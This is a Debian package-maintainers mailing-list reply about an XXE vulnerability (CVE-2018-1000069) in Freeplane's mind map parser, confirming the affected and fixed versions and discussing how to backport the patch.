Bug#893663: freeplane: CVE-2018-1000069 XXE vulnerability
Felix Natter
fnatter at gmx.net
Thu Mar 22 19:52:51 UTC 2018
Markus Koschany <apo at debian.org> writes:
> Package: freeplane
> X-Debbugs-CC: team at security.debian.org
> X-Debbugs-CC: fnatter at gmx.net
> Severity: important
> Tags: security
>
> Hi,
hello Markus,
> the following vulnerability was published for freeplane. Apparently only
> stretch/jessie/wheezy might be affected.
Thank you for paying attention to this, I completely overlooked this!
> @Felix
> Can you tell us more about this vulnerability? There only seems to be a
> reference in freeplane's wiki.
I think it is very well explained here:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
In short: External identities are "includes" for XML documents that can
be specified in DTDs.
Here is the commit that should fix it:
https://github.com/freeplane/freeplane/commit/a5dce7f9f
> https://www.freeplane.org/wiki/index.php/XML_External_Entity_vulnerability_in_map_parser
>
> CVE-2018-1000069[0]:
> | FreePlane version 1.5.9 and earlier contains a XML External Entity
> | (XXE) vulnerability in XML Parser in mindmap loader that can result in
> | stealing data from victim's machine. This attack appears to require
> | the vicim to open a specially crafted mind map file. This
> | vulnerability appears to have been fixed in 1.6+.
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2018-1000069
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000069
>
> Please adjust the affected versions in the BTS as needed.
I can confirm that the the fix is in 1.5.20 and 1.6.1, so it's true that
wheezy, jessie and stretch are affected.
Shall I add the patch in git branches from the debian/X tags here?
https://anonscm.debian.org/cgit/pkg-java/freeplane.git
Or did you want to do this, Markus?
I will read more about security updates on the weekend.
Cheers and Best Regards,
--
Felix Natter
debian/rules!
More information about the pkg-java-maintainers
mailing list